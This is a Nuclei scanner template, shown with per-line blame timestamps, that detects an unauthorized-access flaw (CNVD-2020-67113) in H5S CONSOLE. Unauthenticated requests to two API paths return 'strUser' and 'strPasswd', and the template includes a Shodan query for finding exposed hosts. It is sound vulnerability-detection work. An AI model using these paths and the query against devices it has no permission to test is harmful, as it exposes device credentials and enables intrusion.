2022-04-04 12:55:12 +00:00
|
|
|
id: CNVD-2020-67113
|
2022-04-04 08:16:17 +00:00
|
|
|
|
|
|
|
info:
|
2022-07-05 17:12:00 +00:00
|
|
|
name: H5S CONSOLE - Unauthorized Access
|
2022-04-04 08:16:17 +00:00
|
|
|
author: ritikchaddha
|
2022-07-05 17:12:00 +00:00
|
|
|
severity: medium
|
2022-07-08 19:07:55 +00:00
|
|
|
description: H5S CONSOLE is susceptible to an unauthorized access vulnerability.
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- https://vul.wangan.com/a/CNVD-2020-67113
|
2022-07-05 17:12:00 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
|
|
|
cvss-score: 5.3
|
|
|
|
cwe-id: CWE-425
|
2022-07-06 09:20:31 +00:00
|
|
|
metadata:
|
|
|
|
verified: true
|
|
|
|
shodan-query: http.title:"H5S CONSOLE"
|
|
|
|
tags: cnvd,cnvd2020,h5s,unauth,h5sconsole
|
2022-04-04 08:16:17 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/api/v1/GetSrc"
|
|
|
|
- "{{BaseURL}}/api/v1/GetDevice"
|
|
|
|
|
2022-04-04 13:06:10 +00:00
|
|
|
stop-at-first-match: true
|
2022-04-04 08:16:17 +00:00
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
2022-04-04 12:55:12 +00:00
|
|
|
part: body
|
2022-04-04 08:16:17 +00:00
|
|
|
words:
|
|
|
|
- 'strUser'
|
2022-04-04 12:58:41 +00:00
|
|
|
- 'strPasswd'
|
2022-04-04 08:16:17 +00:00
|
|
|
condition: and
|
|
|
|
|
2022-04-04 12:55:12 +00:00
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
|
|
|
- 'H5_AUTO'
|
2022-04-04 12:58:41 +00:00
|
|
|
- 'H5_DEV'
|
2022-04-04 12:55:12 +00:00
|
|
|
condition: or
|
|
|
|
|
2022-04-04 08:16:17 +00:00
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
2022-04-04 12:55:12 +00:00
|
|
|
- "application/json"
|
2022-04-04 08:16:17 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2022-07-05 17:12:00 +00:00
|
|
|
|
2022-07-08 19:07:55 +00:00
|
|
|
# Enhanced by mp on 2022/07/06
|